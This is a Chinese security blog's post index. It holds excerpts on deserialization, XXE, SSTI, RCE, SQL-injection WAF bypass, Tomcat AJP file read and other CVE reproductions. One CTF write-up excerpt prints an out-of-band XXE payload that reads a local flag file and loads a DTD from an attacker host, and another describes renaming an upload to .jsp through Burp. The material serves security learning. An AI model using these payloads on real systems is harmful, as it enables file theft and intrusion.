安全
夏日清1
不再更新
展开
-
逆向学习fastjson反序列化始
前言text:json文本数据len:json文本数据长度token:代表解析到的这一段数据的类型ch:当前读取到的字符bp:当前字符索引sbuf:正在解析段的数据,char数组sp:sbuf最后一个数据的索引hasSpecial=false:需要初始化或者扩容sbuf参考http://www.b1ue.cn/archives/184.html...原创 2020-07-26 16:09:26 · 7554 阅读 · 0 评论 -
2020网鼎杯---Java文件上传wp
前言一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。题解新建xxe.xlsx文件,修改后缀名xxe.zip解压。修改[Content-Types].xml<!DOCTYPE ANY [<!ENTITY % file SYSTEM "file:///flag"><!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd">%remote;%all;]><root&原创 2020-05-14 14:32:35 · 8093 阅读 · 4 评论 -
Arbitrary file upload vulnerability
admin login required.Under the template interface in the administrator interface, upload a normal file 1.txt burp intercept request package modify the file name to 1.jsp or any other suffix. Includin...原创 2020-05-13 08:45:58 · 3208 阅读 · 0 评论 -
白头搔更短,SSTI惹人心!
万字长文带你走入SSTI的世界,如果你是一名老司机也不要发过这篇文章,里面或许有你不知道的东西!原创 2020-05-13 08:46:35 · 5508 阅读 · 0 评论 -
春眠不觉晓,RCE知多少?
一篇文章带你入门Java代码审计之RCE简单分析Spring Boot Actuators to RCE复现和CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞复现带你入门Java代码审计原创 2020-05-13 08:46:47 · 5747 阅读 · 0 评论 -
一篇文章读懂Java代码审计之XXE
前言 学习总结Java审计过程中笔记,审计方法。阅读要求:有简单Java代码基础,了解漏洞原理。漏洞简介 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。有回显 不说废话,先看效果,成功读取文本内容。 代码分析漏洞成因:public String xxeDo...原创 2020-05-13 08:48:38 · 10178 阅读 · 2 评论 -
CNVD-2020-10487(CVE-2020-1938)tomcat ajp 文件读取漏洞
**# 漏洞简介 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。影响范围Apache Tomca...原创 2020-05-13 08:45:16 · 27236 阅读 · 7 评论 -
bypass 学习笔记之绕安全狗||bypass safedog
目录前言0x00 前期准备0x01 开始尝试绕开判断字段数联合查询爆数据Reference Resources前言走上安全这条路也有9个月了,虽然中途有两个月一直在准备其他的事情,但是安全这条路一直在坚持着。学习安全这么久了,从一开始的脚本小子,我也一直想转变一下,改变自己的现状,但是因为种种事情,给耽误了这个计划。因为接触最多漏洞应该是SQL注入吧,所以我第一想到就是bypass ...原创 2020-05-13 08:48:47 · 3311 阅读 · 0 评论 -
Telegram机器人作为渗透测试框架
目录想法来源工作原理安装配置2个选择NEXT最后致谢AuthorSofiane Hamlaoui原文链接Translator清水Samny想法来源当我查看了浏览器书签,然后我注意medium1有一篇有关Telegram bot的Hacking&Pentesting的文章。 我看了这篇文章并在我的Twitter帐户上分享了它,然后发现有些CyberSec(或Interested b...翻译 2020-05-13 08:48:55 · 6672 阅读 · 0 评论 -
CVE-2019-1388 UAC提权复现
目录0x00 前言0x01 漏洞影响0x02 漏洞复现0x03 免责声明0x04 参考0x00 前言该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY...原创 2020-05-13 08:57:59 · 8425 阅读 · 0 评论 -
【实战技巧】sqlmap不为人知的骚操作
前言如果有不知道这个漏洞,可以先看看下面的文章https://xz.aliyun.com/t/65310x01 注入前知识补充sqlmap参数:–prefix,–suffix在有些环境中,需要在注入的payload的前面或者后面加一些字符,来保证payload的正常执行。例如,代码中是这样调用数据库的:$query = "SELECT * FROM users WHERE id...原创 2020-05-13 08:56:05 · 16911 阅读 · 3 评论 -
网络安全现状与未来蓝图||建立高效的网络安全体系
网络安全现状与未来蓝图||建立高效的网络安全体系。原标题:如何建立有效的网络安全防御体系踏实实验室推出万字长篇文章,踏实君结合十年团队经验和二十年从业经验深度整理和剖析了网络安全防御体系如何有效建立,推荐阅读预计20分钟。转载 2020-05-13 08:55:15 · 9387 阅读 · 5 评论 -
CVE-2019-16097 || Harbor任意管理员注册漏洞复现
目录0x01 前言0x02 漏洞简介及危害0x03 漏洞复现0x04 修复建议#0x01 前言Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全...原创 2020-05-13 08:51:55 · 3755 阅读 · 2 评论 -
So you want to be a Hacker?(所以你想成为黑客?)
本文翻译原文:http://www.treeyhub.com/topics/133/so-you-want-to-be-a-hacker原文链接:https://netsec.ws/?p=468最近,我读到很多关于参与“信息安全”比赛的问题,还有文章和一般性讨论,在我看来,其中存在着不少使人误导的信息。这个结论可能有点苛刻,我确信他们是出于善意的目的,甚至这些建议也能起到帮助作用(没...翻译 2020-05-13 08:51:44 · 2036 阅读 · 0 评论 -
认识OSCP与国外INE机构OSCP课程(价值999美元)已翻译版分享
Offensive Security Certified Professional (OSCP)Most recognized penetration testing certification in the industryEarn after passing the 24-hour performance based examPre-requisite Course: Penetr...原创 2020-05-13 08:50:38 · 13854 阅读 · 4 评论 -
浅谈Pentestbox神器优势
简单介绍说明PentestBox神器 PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,KaliLinux上面的常用的很多工具这里面也都集成了。PentestBox官网:https://pentestbox.org/zh/PentestBox在官网有两个版本:个人推荐安...原创 2020-05-13 08:52:29 · 15959 阅读 · 3 评论 -
再谈cve-2019-0708漏洞最新事情,更新poc及个人说明
距离CVE-2019-0708漏洞出现的了有一段时间了,在此期间poc都更新了几个版本。有人也来问过我具体这个漏洞怎么利用、实现。我在篇文章里面会有统一的回答一下我的见解,希望的大佬们不要喷,以下纯属与个人看法。理解不对希望可以指出。第一,我觉得这个是新爆出的巨大的微软系统漏洞,exp一下是不可能出现的,最近国家在网络上也有些行动的。我建议大家不要这么心急,去想着怎么利用这个漏洞。目前我...原创 2020-05-13 08:50:24 · 7520 阅读 · 0 评论 -
记一次Nessus无法启动问题--Corrupt Database
昨天在做项目的时候,打开Nessus的时候突然发现Nessus无法启动了。报出一堆的七七八八的鸟文。根据鸟文的说法的是:第一步:停止的Nessus服务。我们可以在任务管理器中停止服务。或者运行services.msc命令打开服务管理器(win+r)第二步浏览数据文档路径(参考官方文档)文档会给出在各个不同的操作系统中默认的文...原创 2020-05-13 08:54:06 · 8064 阅读 · 1 评论 -
python脚本之批量查询网站权重
爱站批量查询网站权重blog: https://blog.csdn.net/sun1318578251如果在cmd运行中得先转脚本对应的绝对路径下运行。不然会爆文件不存在的错误。如果在pycharm等集成环境中使用的话,将脚本文件作为一个项目打开。将需要查询的网站保存在相同目录下的websites.txt文本中,一行一个网站。格式:https://www.xxx.com http://ww...原创 2020-05-13 08:53:38 · 2810 阅读 · 7 评论 -
python脚本之批量查询网站权重2.0
2.0支持任意url,相对1.0更加方便。比例说我们可以添加这个url https://blog.csdn.net/sun1318578251/article/details/99304612脚本会自动识别URL中的域名是blog.csdn.net,更加智能。不在限制于网站的是否是域名的格式,只要是域名就能正常查询。(个人比较喜欢这个功能)使用方法参考1.0版本地址:https://b...原创 2020-05-13 08:54:16 · 2921 阅读 · 2 评论 -
惊现CVE-2019-0708 EXP惊醒睡梦中的安全圈
目录0x01前言0x02杂谈0x02了解信息0x03最新文章0x04免责声明0x01前言CVE-2019-0708这个漏洞最早在今年5月份被曝光。浅谈CVE-2019-0708再谈CVE-2019-0708大家可以看看这两篇博客,博主当初写的。内容很详细,还不了解的人可以看看。内含CVE-2019-0708的POC。博主一早睡醒,看看朋友...原创 2020-05-13 08:54:42 · 10385 阅读 · 4 评论 -
【漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现
目录0x00前言0x01漏洞描述0x02漏洞复现0x03漏洞POC0x04影响范围0x05漏洞防护0x06免责声明0x00前言2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛...原创 2020-05-13 08:54:57 · 10414 阅读 · 1 评论 -
渣渣白使用Safe3 SQL注入实战篇
说明:1. 未经授权的渗透测试都是违法的! 2. 文章用红色字体编写的部分是关键部分(认真看)!!! 3. 文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4. 文章用其他颜色字体编写的部分是次要部分。由于小伙伴们的强烈热情,我写下这篇博客。文章内容:简单的使用Safe3 SQL工具拿下一个网站后台。...原创 2020-05-13 08:51:06 · 2746 阅读 · 4 评论